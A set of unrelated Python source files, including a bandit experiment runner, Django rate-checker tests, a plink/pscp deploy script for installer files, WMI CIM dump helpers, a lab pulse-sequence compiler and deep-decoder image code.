    parser.add_argument('--time_horizon', type=int, default=int(1e6), help='total time horizon to run')
    parser.add_argument('--n_random_seeds', type=int, default=3, help='total amount of random seeds')
    parser.add_argument('--n_actions', type=int, default=5, help='number of actions')
    parser.add_argument('--dimension', type=int, default=20, help='dimension of context')
    parser.add_argument('--eps', type=float, nargs='+', default=[1], help='privacy epsilon')
    parser.add_argument('--echo_freq', type=int, default=100, help='echo frequency')
    parser.add_argument('--dest', type=str, default='/results/multi-param-eps=0.5/', help='destination folders')
    args = parser.parse_args()

    prefix = [pdir + args.dest]
    random_seeds = list(range(args.n_random_seeds))
    if not os.path.exists(prefix[0]):
        os.makedirs(prefix[0])

    n_process = min(len(args.eps)*args.n_random_seeds, 3)
    print(f'using {n_process} processes')
    with Pool(processes=n_process) as pool:
        collection_source = pool.starmap(run, product(random_seeds, prefix, args.eps,
                                                      [args.n_actions], [args.time_horizon], [args.dimension]))
    plotters.multiparam_exp_plot(prefix[0], 'Multiparam', 'r')
    plotters.multiparam_exp_plot(prefix[0], 'Multiparam', 'est')
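# A hedged invocation sketch for the experiment driver above; the script file
# name `run_multiparam.py` is an assumption. Each (random_seed, epsilon) pair
# runs in its own worker process via Pool.starmap, writes one CSV into
# pdir + --dest, and the two plotter calls summarize regret ('r') and
# estimation error ('est') across runs:
#
#   python run_multiparam.py --eps 0.5 1.0 --n_actions 5 --dimension 20 \
#       --time_horizon 1000000 --n_random_seeds 3 --dest /results/multi-param-eps=0.5/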
438789
from ipywidgets import Box

from hdijupyterutils.ipythondisplay import IpythonDisplay
from hdijupyterutils.ipywidgetfactory import IpyWidgetFactory


class AbstractMenuWidget(Box):
    def __init__(self, spark_controller, ipywidget_factory=None, ipython_display=None,
                 nested_widget_mode=False, testing=False, **kwargs):
        kwargs['orientation'] = 'vertical'

        if not testing:
            super(AbstractMenuWidget, self).__init__((), **kwargs)

        self.spark_controller = spark_controller

        if ipywidget_factory is None:
            ipywidget_factory = IpyWidgetFactory()
        self.ipywidget_factory = ipywidget_factory

        if ipython_display is None:
            ipython_display = IpythonDisplay()
        self.ipython_display = ipython_display

        self.children = []

        if not nested_widget_mode:
            self._repr_html_()

    def _repr_html_(self):
        for child in self.children:
            self.ipython_display.display(child)
        return ""

    def hide_all(self):
        for child in self.children:
            child.visible = False

    def run(self):
        raise NotImplementedError("Concrete menu widget must define run")
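# A minimal concrete-subclass sketch for the abstract widget above. The widget
# and handler names are invented for illustration, and `get_button` is assumed
# to exist on the injected hdijupyterutils factory; only the run() override is
# the real contract defined by AbstractMenuWidget.
class RefreshMenuWidget(AbstractMenuWidget):
    def __init__(self, spark_controller, **kwargs):
        super(RefreshMenuWidget, self).__init__(spark_controller, **kwargs)
        # Assumed factory call; any ipywidgets Button would work equally well.
        self.refresh_button = self.ipywidget_factory.get_button(description="Refresh")
        self.refresh_button.on_click(lambda _: self.run())
        self.children = [self.refresh_button]

    def run(self):
        # A real widget would call into self.spark_controller here; this
        # placeholder only satisfies the abstract contract.
        pass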
438815
import json
from datetime import datetime, timedelta

from django.test import override_settings
from django.utils import timezone

from model_mommy import mommy
from rest_framework import status
from rest_framework.test import APITestCase

from ratechecker.models import Adjustment, Product, Rate, Region
from ratechecker.views import set_lock_max_min

try:
    from django.urls import reverse
except ImportError:
    from django.core.urlresolvers import reverse


class RateCheckerTestCase(APITestCase):
    def setUp(self):
        self.url = "/oah-api/rates/rate-checker"

        REGIONS = [[1, "DC"], [2, "VA"]]

        PRODUCTS = [
            # plan_id, institution, loan_purpose, pmt_type, loan_type, loan_term, int_adj_term, _, io, _, _, _, _, _, _,  # noqa
            # min_ltv, max_ltv, minfico, maxfico, min_loan_amt, max_loan_amt, single_family, condo, coop  # noqa
            [11, "Institution 1", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None,
             1, 95, 680, 700, 90000, 750000, 1, 0, 0],
            [22, "Institution 2", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None,
             1, 87, 680, 740, 90000, 550000, 1, 0, 0],
            [33, "Institution 3", "PURCH", "ARM", "CONF", 15, 5, None, 0, None, None, None, None, None, None,
             1, 95, 680, 740, 90000, 550000, 1, 0, 0],
            [44, "Institution 4", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None,
             1, 87, 680, 740, 90000, 550000, 1, 0, 0],
            [55, "Institution 5", "PURCH", "ARM", "CONF", 30, 5, None, 0, None, None, None, None, None, None,
             1, 87, 680, 740, 90000, 550000, 1, 0, 0],
            [66, "Institution 6", "PURCH", "FIXED", "CONF", 30, None, None, 0, None, None, None, None, None, None,
             1, 87, 680, 740, 90000, 550000, 1, 0, 0],
            [77, "Institution 7", "PURCH", "FIXED", "FHA-HB", 15, None, None, 0, None, None, None, None, None, None,
             1, 87, 680, 740, 90000, 550000, 1, 0, 0],
            [88, "Institution 8", "PURCH", "FIXED", "FHA", 30, None, None, 0, None, None, None, None, None, None,
             1, 87, 680, 740, 90000, 550000, 1, 0, 0],
        ]

        RATES = [
            # rate_id, product_id, region_id, lock, base_rate, total_points
            [111, 11, 1, 50, "3.150", "0.5"],
            [112, 11, 2, 60, "4.350", "-0.5"],
            [113, 11, 1, 60, "2.125", "0.125"],
            [221, 22, 1, 60, "3.555", "0.125"],
            [331, 33, 1, 60, "3.250", "0.125"],
            [332, 33, 2, 60, "4.650", "-0.5"],
            [441, 44, 1, 50, "3.125", "1.25"],
            [551, 55, 1, 50, "0.125", "0.125"],
            [661, 66, 1, 60, "3.705", "0.5"],
            [771, 77, 2, 60, "1.705", "0.25"],
            [772, 77, 2, 60, "2.705", "1.25"],
            [881, 88, 1, 60, "3.000", "0.5"],
            [882, 88, 1, 60, "2.005", "0.25"],
            [883, 88, 1, 60, "1.005", "-0.25"],
        ]

        ADJUSTMENTS = [
            # rule_id, product_id, affect_rate_type, adj_value, min_loan_amt,
            # max_loan_amt, prop_type, minfico, maxfico, minltv, maxltv, state
            [1, 11, "P", "-0.35", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC"],
            [2, 11, "P", "0.25", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC"],
            [3, 11, "R", "0.15", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC"],
            [4, 22, "R", "0.25", 100000, 500000, "CONDO", 660, 780, 30, 95, "VA"],
            [5, 22, "R", "0.15", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC"],
            [6, 33, "R", "0.25", 100000, 500000, "CONDO", 660, 780, 30, 95, "DC"],
            [7, 77, "P", "0.125", 100000, 500000, "CONDO", 660, 780, 30, 95, "VA"],
        ]

        NOW = timezone.now()

        for region in REGIONS:
            reg = Region(region_id=region[0], state_id=region[1], data_timestamp=NOW)
            reg.save()

        for p in PRODUCTS:
            product = Product(
                plan_id=p[0], institution=p[1], loan_purpose=p[2], pmt_type=p[3],
                loan_type=p[4], loan_term=p[5], int_adj_term=p[6], adj_period=p[7],
                io=p[8], arm_index=p[9], int_adj_cap=p[10], annual_cap=p[11],
                loan_cap=p[12], arm_margin=p[13], ai_value=p[14], min_ltv=p[15],
                max_ltv=p[16], min_fico=p[17], max_fico=p[18], min_loan_amt=p[19],
                max_loan_amt=p[20], single_family=p[21], condo=p[22], coop=p[23],
                data_timestamp=NOW,
            )
            product.save()

        for r in RATES:
            rate = Rate(
                rate_id=r[0], product_id=r[1], region_id=r[2], lock=r[3],
                base_rate=r[4], total_points=r[5], data_timestamp=NOW,
            )
            rate.save()

        for a in ADJUSTMENTS:
            adjustment = Adjustment(
                rule_id=a[0], product_id=a[1], affect_rate_type=a[2], adj_value=a[3],
                min_loan_amt=a[4], max_loan_amt=a[5], prop_type=a[6], min_fico=a[7],
                max_fico=a[8], min_ltv=a[9], max_ltv=a[10], state=a[11],
                data_timestamp=NOW,
            )
            adjustment.save()

    def test_set_lock_max_min(self):
        """Make sure max and min are set"""
        locks = {
            60: {"lock": "60", "minval": 46},
            45: {"lock": "45", "minval": 31},
            30: {"lock": "30", "minval": 0},
        }
        for key in locks.keys():
            mock_data = set_lock_max_min(locks[key])
            self.assertEqual(mock_data["max_lock"], key)
            self.assertEqual(mock_data["min_lock"], locks[key]["minval"])

    def test_rate_checker__no_args(self):
        """... when no parameters provided"""
        response = self.client.get(self.url, {})
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_rate_checker__valid(self):
        """... when valid parameters are provided"""
        params = {
            "state": "DC",
            "loan_purpose": "PURCH",
            "rate_structure": "FIXED",
            "loan_type": "CONF",
            "max_ltv": 50,
            "min_ltv": 50,
            "loan_term": 30,
            "loan_amount": 160000,
            "price": 320000,
            "maxfico": 700,
            "minfico": 700,
            "max_lock": 60,
            "min_lock": 45,
            "property_type": "CONDO",
            "arm_type": "5-1",
            "io": 0,
        }
        response = self.client.get(self.url, params)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data.get("data")), 2)
        self.assertEqual(response.data.get("data").get("2.275"), 1)
        self.assertEqual(response.data.get("data").get("3.705"), 2)
        # self.assertTrue(result)
        # self.assertEqual(len(result), 2)
        # self.assertEqual(len(result['data']), 2)
        # self.assertEqual(result['data']['2.275'], 1)
        # self.assertEqual(result['data']['3.705'], 2)
        # self.assertFalse(response_fixed.data.get('data') is None)
        # self.assertEqual(response_fixed.data.get('data').get('monthly'), 1.5)
        # self.assertTrue(response_fixed.data.get('data').get('upfront') is None)  # noqa


@override_settings(URLCONF="ratechecker.urls")
class RateCheckerStatusTest(APITestCase):
    def get(self):
        return self.client.get(
            reverse("rate-checker-status"),
            headers={"Accepts": "application/json"},
        )

    def test_no_data_returns_200(self):
        response = self.get()
        self.assertEqual(response.status_code, 200)

    def test_no_data_returns_json(self):
        response = self.get()
        self.assertEqual(response["Content-type"], "application/json")

    def test_no_data_returns_none(self):
        response = self.get()
        self.assertEqual(json.loads(response.content), {"load": None})

    def test_data_returns_200(self):
        mommy.make(Region)
        response = self.get()
        self.assertEqual(response.status_code, 200)

    def test_data_returns_json(self):
        mommy.make(Region)
        response = self.get()
        self.assertEqual(response["Content-type"], "application/json")

    def test_data_returns_timestamp(self):
        region = mommy.make(Region)
        response = self.get()
        ts = datetime.strptime(
            json.loads(response.content)["load"], "%Y-%m-%dT%H:%M:%S.%fZ"
        )
        ts = timezone.make_aware(ts, timezone=timezone.utc)
        # These might not match exactly due to ISO8601 JSON formatting.
        self.assertTrue(abs(ts - region.data_timestamp) < timedelta(seconds=1))

    def test_data_format_iso8601(self):
        timestamp = datetime(2017, 1, 2, 3, 4, 56, tzinfo=timezone.utc)
        mommy.make(Region, data_timestamp=timestamp)
        response = self.get()
        self.assertContains(response, "2017-01-02T03:04:56Z")
438827
import os, sys, stat
import CalcDigest

def fileSize( f ) :
    return os.stat(f)[stat.ST_SIZE]

def execRemote( cmd ) :
    return os.popen( 'plink ks@172.16.17.32 %s' % cmd ).read()

def main() :
    updateBuildNumber = int(file('CSpaceUpdate-BuildNumber.txt').read().strip())
    updateFile = 'CSpaceUpdate%d.exe' % updateBuildNumber
    updateRequires = int(file('CSpaceUpdate-Requires.txt').read().strip())
    updateSize = fileSize( updateFile )

    setupBuildNumber = int(file('CSpaceSetup-BuildNumber.txt').read().strip())
    setupFile = 'CSpaceSetup%d.exe' % setupBuildNumber
    setupRequires = 0
    setupSize = fileSize( setupFile )

    latest = file('LatestVersion.txt','w')
    print>>latest, '%s:%d:%d:%d' % (updateFile,updateSize,updateBuildNumber,updateRequires)
    print>>latest, '%s:%d:%d:%d' % (setupFile,setupSize,setupBuildNumber,setupRequires)
    latest.close()

    fileList = [updateFile,setupFile,'LatestVersion.txt']
    fileList.extend( ['CalcDigest.py', 'UpdateLatest.py'] )

    localDigests = CalcDigest.digestList( fileList )
    remoteDigests = {}
    print 'Fetching server digest list...'
    data = execRemote( 'cd /var/www-cspace.in/setupfiles; python CalcDigest.py %s' % (' '.join(fileList)) )
    for line in data.split('\n') :
        line = line.strip()
        if not line : continue
        fileName,digest = line.split()
        remoteDigests[fileName] = digest

    for (fileName,digest) in localDigests :
        rd = remoteDigests.get( fileName, None )
        sendFile = False
        if rd is None :
            status = 'file not found on remote server'
            sendFile = True
        elif digest == rd :
            status = 'file same on remote server'
        else :
            status = 'file differs on remote server'
            sendFile = True
        print '%s: %s' % (fileName,status)
        if sendFile :
            remoteUpdated = True
            print 'uploading file: %s' % fileName
            os.system( 'pscp %s ks@172.16.17.32:/var/www-cspace.in/setupfiles/%s' % (fileName,fileName) )

    print 'Activating latest files'
    execRemote( 'cd /var/www-cspace.in/setupfiles; python UpdateLatest.py' )

if __name__ == '__main__' :
    main()
438846
from celery import shared_task
from django.conf import settings

from courses.bridge import import_courses as bridge_import_courses


@shared_task
def import_courses(force=False, all=False, catalog=True):
    bridge_import_courses(force=force, all=all, catalog=catalog)
438870
from .common import h
from .objects import CIM_TYPE_SIZES


def dump_definition(cd, cl):
    """
    :type cd: ClassDefinition
    :type cl: ClassLayout
    """
    # TODO: migrate to templating?
    ret = []

    ret.append("classname: %s" % cd.class_name)
    ret.append("super: %s" % cd.super_class_name)
    ret.append("ts: %s" % cd.timestamp.isoformat("T"))
    ret.append("qualifiers:")
    for k, v in cd.qualifiers.items():
        ret.append("  %s: %s" % (k, str(v)))
    ret.append("properties:")
    for propname, prop in sorted(cd.properties.items(), key=lambda p: p[1].index):
        ret.append("  name: %s" % prop.name)
        ret.append("    type: %s" % prop.type)
        ret.append("    index: %s" % prop.index)
        ret.append("    level: %s" % prop.level)
        ret.append("    offset: %s" % h(prop.offset))
        ret.append("    qualifiers:")
        for k, v in prop.qualifiers.items():
            ret.append("      %s: %s" % (k, str(v)))
    ret.append("layout:")
    off = 0
    if cl is not None:
        for prop in sorted(cl.properties.values(), key=lambda p: p.index):
            ret.append("  (%s) %s %s" % (h(off), prop.type, prop.name))
            if prop.type.is_array:
                off += 0x4
            else:
                off += CIM_TYPE_SIZES[prop.type.type]
    ret.append("=" * 80)
    ret.append("keys:")
    for key in cd.keys:
        ret.append("  %s" % key)
    ret.append("=" * 80)
    ret.append(cd.tree())
    return "\n".join(ret)


def dump_layout(cd, cl):
    """
    :type cd: ClassDefinition
    :type cl: ClassLayout
    """
    # TODO: migrate to templating?
    ret = []

    ret.append("classname: %s" % cd.class_name)
    ret.append("super: %s" % cd.super_class_name)
    ret.append("ts: %s" % cd.timestamp.isoformat("T"))
    ret.append("qualifiers:")
    for k, v in cd.qualifiers.items():
        ret.append("  %s: %s" % (k, str(v)))
    ret.append("properties:")
    for propname, prop in sorted(cl.properties.items(), key=lambda p: p[1].index):
        ret.append("  name: %s" % prop.name)
        ret.append("    type: %s" % prop.type)
        ret.append("    index: %s" % prop.index)
        ret.append("    level: %s" % prop.level)
        ret.append("    offset: %s" % h(prop.offset))
        ret.append("    qualifiers:")
        for k, v in prop.qualifiers.items():
            ret.append("      %s: %s" % (k, str(v)))
        ret.append("    has default value: %s" % str(prop.has_default_value))
        if prop.has_default_value:
            ret.append("    is inherited: %s" % str(prop.is_inherited))
            dv = str(prop.default_value)
            ret.append("    default value: %s" % dv)
    ret.append("layout:")
    off = 0
    if cl is not None:
        for prop in sorted(cl.properties.values(), key=lambda p: p.index):
            ret.append("  (%s) %s %s" % (h(off), prop.type, prop.name))
            if prop.type.is_array:
                off += 0x4
            else:
                off += CIM_TYPE_SIZES[prop.type.type]
    ret.append("=" * 80)
    ret.append("keys:")
    for key in cd.keys:
        ret.append("  %s" % key)
    ret.append("=" * 80)
    ret.append(cd.tree())
    return "\n".join(ret)


def dump_instance(i, encoding=None, encoding_errors='strict'):
    """
    :type i: ClassInstance
    """
    # TODO: migrate to templating?
    ret = []
    cl = i.class_layout
    cd = cl.class_definition
    ret.append("classname: %s" % cd.class_name)
    ret.append("super: %s" % cd.super_class_name)
    ret.append("key: %s" % str(i.key))
    ret.append("timestamp1: %s" % i.ts1)
    ret.append("timestamp2: %s" % i.ts2)
    ret.append("properties:")
    for propname, prop in i.properties.items():
        quals = ",".join(["{:s}={:s}".format(str(k), str(v)) for k, v in prop.qualifiers.items()])
        if quals != "":
            quals = " [{:s}]".format(quals)
            ret.append(quals)
        if prop.is_initialized:
            ret.append("  {key:s}={value:s}".format(key=prop.name, value=str(prop.value)))
            if prop.is_default_value:
                ret.append("    default value: true")
        else:
            ret.append("  {key:s}=nil".format(key=prop.name))
    ret.append("")
    instance_str = "\n".join(ret)

    # encode to specified encoding (which returns a byte array),
    # and then decode back to a string
    if encoding:
        instance_str = instance_str.encode(encoding=encoding, errors=encoding_errors).decode(encoding)
    return instance_str
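# A hedged usage sketch for the three dump helpers above. They expect the
# ClassDefinition/ClassLayout/ClassInstance objects produced by a WMI CIM
# repository parser; the CIM constructor, path, and resolve_class helper named
# below are assumptions for illustration, not part of this module.
#
#   from cim import CIM
#   repo = CIM("win7", "C:/Windows/System32/wbem/Repository")
#   cd, cl = resolve_class(repo, "CIM_Process")   # hypothetical helper
#   print(dump_definition(cd, cl))
#   print(dump_layout(cd, cl))
#   for instance in enumerate_instances(repo, cd):  # hypothetical helper
#       print(dump_instance(instance, encoding="utf-8"))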
438877
from simpleeval import simple_eval, NameNotDefined
from datetime import datetime
import uuid
import copy

import pylabnet.utils.pulseblock.pulse as po
import pylabnet.utils.pulseblock.pulse_block as pb
from pylabnet.utils.iq_upconversion.iq_calibration import IQ_Calibration
from pylabnet.utils.pulseblock.placeholder import Placeholder


class PulseblockConstructor():
    """Container class which stores all necessary information to compile a
    full Pulseblock, while retaining the ability to change variables and
    easy save/load functionality.
    """

    def __init__(self, name, log, var_dict, config=None):
        self.name = name
        self.log = log

        self.var_dict = var_dict
        self.pulse_specifiers = []
        self.pulseblock = None
        self.config = config

        # Guard against config=None before the membership test (the original
        # bare `"iq_cal_path" in self.config` raises TypeError for None).
        if self.config is not None and "iq_cal_path" in self.config:
            self.iq_calibration = IQ_Calibration(log=log)
            self.iq_calibration.load_calibration(self.config["iq_cal_path"])

    def default_placeholder_value(self, placeholder_name):
        for key in Placeholder.default_values:
            if placeholder_name.startswith(key):
                return Placeholder(placeholder_name, Placeholder.default_values[key])
        self.log.warn(f"Placeholder name {placeholder_name} not found in defaults, using 0.")
        return Placeholder(placeholder_name, 0.0)

    def resolve_value(self, input_val):
        """ Return the value of input_val.

        If input_val is not a string, it is returned unchanged. Otherwise it
        may be a variable, as defined in the keys of var_dict; in that case
        the value associated with that variable is returned.

        :input: (str / float / bool etc) Variable value or variable string.
        """
        if type(input_val) is not str:
            return input_val
        else:
            try:
                return simple_eval(input_val, names=self.var_dict)
            except NameNotDefined:
                self.log.warn(f"Could not resolve variable '{input_val}', treating as placeholder.")
                return self.default_placeholder_value(input_val)

    def append_value_to_dict(self, search_dict, key, append_dict, fn=None, new_key=None):
        """ Append a searched value from a search dictionary to a separate
        dictionary, if the given key exists.

        :search_dict: (dict) Dictionary to search the key for
        :key: (str) Key to query the search dictionary using
        :append_dict: (dict) Value of the found key will be appended into
            this dictionary if it exists
        :fn: (function, optional) Function to be applied to the found value
        :new_key: (str, optional) New key that the found value will be added
            to in the append_dict. If not provided, it will use the old key.
        """
        if key in search_dict:
            value = self.resolve_value(search_dict[key])
            if fn is not None:
                value = fn(value)
            if new_key is None:
                new_key = key
            append_dict[new_key] = value

    def compile_pulseblock(self):
        """ Compiles the list of pulse_specifiers and var dicts into a valid
        Pulseblock.
        """
        pulseblock = pb.PulseBlock(name=self.name)

        for i, pb_spec in enumerate(self.pulse_specifiers):

            var_dict = pb_spec.pulsevar_dict
            arg_dict = {}

            # Extract parameters from the pulsevar dict
            offset = self.resolve_value(pb_spec.offset) * 1e-6
            arg_dict["ch"] = pb_spec.channel
            arg_dict["dur"] = self.resolve_value(pb_spec.dur) * 1e-6
            self.append_value_to_dict(var_dict, "val", arg_dict)
            self.append_value_to_dict(var_dict, "amp", arg_dict)
            self.append_value_to_dict(var_dict, "freq", arg_dict)
            self.append_value_to_dict(var_dict, "ph", arg_dict)
            self.append_value_to_dict(var_dict, "stdev", arg_dict, fn=lambda x: 1e-6 * x)
            self.append_value_to_dict(var_dict, "iq", arg_dict)
            self.append_value_to_dict(var_dict, "mod", arg_dict)
            self.append_value_to_dict(var_dict, "mod_freq", arg_dict)
            self.append_value_to_dict(var_dict, "mod_ph", arg_dict)

            supported_pulses = {
                "PTrue": po.PTrue,
                "PSin": po.PSin,
                "PGaussian": po.PGaussian,
                "PConst": po.PConst
            }

            # Handle IQ mixing case
            if "iq" in arg_dict and arg_dict["iq"]:
                (if_freq, lo_freq, phase_opt,
                 amp_i_opt, amp_q_opt,
                 dc_i_opt, dc_q_opt) = self.iq_calibration.get_optimal_hdawg_and_LO_values(arg_dict["mod_freq"])
                self.log.info(f"if={if_freq}, lo={lo_freq}, phase={phase_opt}")

                # Store the optimal IQ parameters as 2 separate dictionaries
                arg_dict_i = copy.deepcopy(arg_dict)
                arg_dict_q = copy.deepcopy(arg_dict)

                # Modify the channel names
                arg_dict_i["ch"] = arg_dict["ch"] + "_i"
                arg_dict_q["ch"] = arg_dict["ch"] + "_q"

                # Modulation frequency changed to IF
                arg_dict_i["mod_freq"] = if_freq
                arg_dict_q["mod_freq"] = if_freq

                # Relative phase
                arg_dict_i["mod_ph"] = arg_dict["mod_ph"] + phase_opt[0]

                # The amplitude is the amplitude of the Sin generator and is
                # independent of ["amp"], the signal amplitude.
                arg_dict_i["iq_params"] = {"amp_iq": amp_i_opt[0], "dc_iq": dc_i_opt[0], "lo_freq": lo_freq}
                arg_dict_q["iq_params"] = {"amp_iq": amp_q_opt[0], "dc_iq": dc_q_opt[0], "lo_freq": lo_freq}

                arg_dict_list = [arg_dict_i, arg_dict_q]
            else:
                arg_dict_list = [arg_dict]

            # Construct a pulse and add it to the pulseblock.
            # The iteration over arg_dict takes care of the IQ mixing case:
            # idx = 0 is the I portion, idx = 1 is the Q portion.
            for idx, arg_dict in enumerate(arg_dict_list):

                # Construct single pulse.
                if pb_spec.pulsetype in supported_pulses:
                    pulse = supported_pulses[pb_spec.pulsetype](**arg_dict)
                else:
                    pulse = None
                    self.log.warn(f"Found an unsupported pulse type {pb_spec.pulsetype}")

                pb_dur = pulseblock.dur
                prev_t0 = pulseblock.latest_t0
                prev_dur = pulseblock.latest_dur

                # idx = 0 refers to the I pulse (or a normal non-IQ pulse)
                if idx == 0:
                    # CASE 1
                    if pb_spec.tref == "Absolute":
                        pulseblock.append_po_as_pb(
                            p_obj=pulse,
                            offset=-pb_dur + offset
                        )
                    # CASE 2
                    elif pb_spec.tref in ("After Last Pulse", "At End of Sequence"):
                        # For compatibility with previous naming
                        pulseblock.append_po_as_pb(
                            p_obj=pulse,
                            offset=offset
                        )
                    # CASE 3
                    elif pb_spec.tref in ("With Last Pulse", "With Previous Pulse"):
                        # For compatibility with previous naming.
                        # Take timing reference based on the last pulse's t0.
                        pulseblock.append_po_as_pb(
                            p_obj=pulse,
                            offset=-pb_dur + prev_t0 + offset
                        )
                    # CASE 4
                    elif pb_spec.tref == "After Previous Pulse":
                        # Take timing reference based on the last pulse's t0 and duration
                        pulseblock.append_po_as_pb(
                            p_obj=pulse,
                            offset=-pb_dur + prev_t0 + prev_dur + offset
                        )
                    # CASE 5
                    elif pb_spec.tref == "After Last Pulse On Channel":
                        # Get the end time of the last pulse on the ch
                        ch = pb.Channel(name=arg_dict["ch"], is_analog=pulse.is_analog)
                        if ch in pulseblock.p_dict.keys():
                            last_pulse = pulseblock.p_dict[ch][-1]
                            last_pulsetime = last_pulse.t0 + last_pulse.dur
                        else:
                            last_pulsetime = 0
                        pulseblock.append_po_as_pb(
                            p_obj=pulse,
                            offset=-pb_dur + last_pulsetime + offset
                        )
                else:
                    # idx = 1 here (Q pulse).
                    # Force the 2nd pulse to start at the same time as the first
                    # pulse in an IQ mix pulse. Note that prev_t0 is the t0 of
                    # the I pulse since this is executed right after the I pulse.
                    pulseblock.append_po_as_pb(
                        p_obj=pulse,
                        offset=-pb_dur + prev_t0
                    )

        self.pulseblock = pulseblock
        self.clean_pulseblock_timings()

    def clean_pulseblock_timings(self):
        """ Round all timings to 10 decimal places (0.1 ns) to avoid
        floating point problems.
        """
        if self.pulseblock is None:
            return

        for ch in self.pulseblock.p_dict.keys():
            for p_item in self.pulseblock.p_dict[ch]:
                # Can't use normal round() for Placeholder as it would
                # be cast to a plain float.
                if type(p_item.t0) == Placeholder:
                    p_item.t0.round_val(10)
                else:
                    p_item.t0 = round(p_item.t0, 10)
                if type(p_item.dur) == Placeholder:
                    p_item.dur.round_val(10)
                else:
                    p_item.dur = round(p_item.dur, 10)

    def get_dict(self):
        """Get dictionary representing the pulseblock."""
        # Compile
        self.compile_pulseblock()

        pb_dictionary = {}
        pb_dictionary["name"] = self.name
        pb_dictionary["dur"] = self.pulseblock.dur
        pb_dictionary["timestamp"] = datetime.now().strftime("%d-%b-%Y_%H_%M_%S")
        pb_dictionary["var_dict"] = self.var_dict
        pb_dictionary["pulse_specifiers_dicts"] = [ps.get_dict() for ps in self.pulse_specifiers]
        self.log.info(str(pb_dictionary))
        return pb_dictionary

    def load_as_dict(self):
        pass


class PulseSpecifier():
    """Container storing info fully specifying a pulse within a pulse sequence."""

    def __init__(self, channel, pulsetype, pulsetype_name, is_analog):
        self.channel = channel
        self.pulsetype = pulsetype
        self.pulsetype_name = pulsetype_name
        self.is_analog = is_analog

        # Generate random unique identifier.
        self.uid = uuid.uuid1()

    def set_timing_info(self, offset, dur, tref):
        self.offset = offset
        self.dur = dur
        self.tref = tref

    def set_pulse_params(self, pulsevar_dict):
        self.pulsevar_dict = pulsevar_dict

    def get_printable_name(self):
        return f"{self.channel.capitalize()} ({self.pulsetype_name})"

    # Reader friendly string return.
    def __str__(self):
        return self.get_printable_name()

    def get_dict(self):
        """Store all member variables as dictionary for easy saving."""
        pulse_specifier_dict = {}
        pulse_specifier_dict['pulsetype'] = self.pulsetype
        pulse_specifier_dict['channel'] = self.channel
        pulse_specifier_dict['is_analog'] = self.is_analog
        pulse_specifier_dict['dur'] = self.dur
        pulse_specifier_dict['offset'] = self.offset
        pulse_specifier_dict['tref'] = self.tref
        pulse_specifier_dict['pulse_vars'] = self.pulsevar_dict
        pulse_specifier_dict['name'] = self.pulsetype_name
        return pulse_specifier_dict
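# A hedged usage sketch for the two classes above. The channel name, pulse
# type arguments, and variable names are invented for illustration, and a
# no-op logger is stubbed in place of the host application's real log object.
class _NullLog:
    def info(self, msg):
        pass

    def warn(self, msg):
        pass


spec = PulseSpecifier(channel="aom", pulsetype="PConst",
                      pulsetype_name="Constant", is_analog=True)
spec.set_timing_info(offset=0.0, dur="2 * tau", tref="Absolute")
spec.set_pulse_params({"val": 1.0})

ctor = PulseblockConstructor(name="demo", log=_NullLog(),
                             var_dict={"tau": 0.5}, config={})
ctor.pulse_specifiers.append(spec)
# resolve_value evaluates "2 * tau" -> 1.0 via simple_eval, then
# compile_pulseblock scales durations/offsets by 1e-6 (microseconds).
ctor.compile_pulseblock()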
438893
from torch.autograd import Variable
import torch
import torch.optim

import copy
import numpy as np

from .helpers import *
from .decoder import *
from .fit import *
from .wavelet import *


def rep_error_deep_decoder(img_np, k=128, convert2ycbcr=False):
    ''' mse obtained by representing img_np with the deep decoder '''
    output_depth = img_np.shape[0]
    if output_depth == 3 and convert2ycbcr:
        img = rgb2ycbcr(img_np)
    else:
        img = img_np
    img_var = np_to_var(img).type(dtype)

    num_channels = [k]*5
    net = decodernwv2(output_depth, num_channels_up=num_channels, bn_before_act=True).type(dtype)

    rnd = 500
    numit = 15000
    rn = 0.005
    mse_n, mse_t, ni, net = fit(
        num_channels=num_channels,
        reg_noise_std=rn,
        reg_noise_decayevery=rnd,
        num_iter=numit,
        LR=0.004,
        img_noisy_var=img_var,
        net=net,
        img_clean_var=img_var,
        find_best=True,
    )
    out_img = net(ni.type(dtype)).data.cpu().numpy()[0]
    if output_depth == 3 and convert2ycbcr:
        out_img = ycbcr2rgb(out_img)
    return psnr(out_img, img_np), out_img, num_param(net)


def rep_error_wavelet(img_np, ncoeff=300):
    '''
    mse obtained by representing img_np with wavelet thresholding
    ncoeff coefficients are retained per color channel
    '''
    if img_np.shape[0] == 1:
        img_np = img_np[0, :, :]
        out_img_np = denoise_wavelet(img_np, ncoeff=ncoeff, multichannel=False, convert2ycbcr=True, mode='hard')
    else:
        img_np = np.transpose(img_np)
        out_img_np = denoise_wavelet(img_np, ncoeff=ncoeff, multichannel=True, convert2ycbcr=True, mode='hard')
        # img_np = np.array([img_np[:,:,0],img_np[:,:,1],img_np[:,:,2]])
    return psnr(out_img_np, img_np), out_img_np


def myimgshow(plt, img):
    if img.shape[0] == 1:
        plt.imshow(np.clip(img[0], 0, 1), cmap='Greys', interpolation='none')
    else:
        plt.imshow(np.clip(img.transpose(1, 2, 0), 0, 1), interpolation='none')
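# A hedged usage sketch comparing the two representation errors defined above
# on a random test image. It assumes the module's package (with its helpers,
# decoder, fit, and wavelet submodules plus a CUDA `dtype`) is importable, and
# the 3x256x256 random image is purely illustrative; real experiments would
# use natural images.
import numpy as np
import matplotlib.pyplot as plt

img = np.random.rand(3, 256, 256).astype(np.float32)
psnr_dd, out_dd, n_params = rep_error_deep_decoder(img, k=64)
psnr_wav, out_wav = rep_error_wavelet(img, ncoeff=300)
print("deep decoder: %.2f dB with %d params; wavelet: %.2f dB"
      % (psnr_dd, n_params, psnr_wav))
myimgshow(plt, out_dd)
plt.show()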
438920
from .unittest_tools import unittest
from quantlib.quotes import SimpleQuote


class SimpleQuoteTestCase(unittest.TestCase):

    def test_round_trip(self):
        value = 72.03
        quote = SimpleQuote(value)
        self.assertAlmostEqual(value, quote.value)

    def test_empty_constructor(self):
        quote = SimpleQuote()
        self.assertFalse(quote.is_valid)
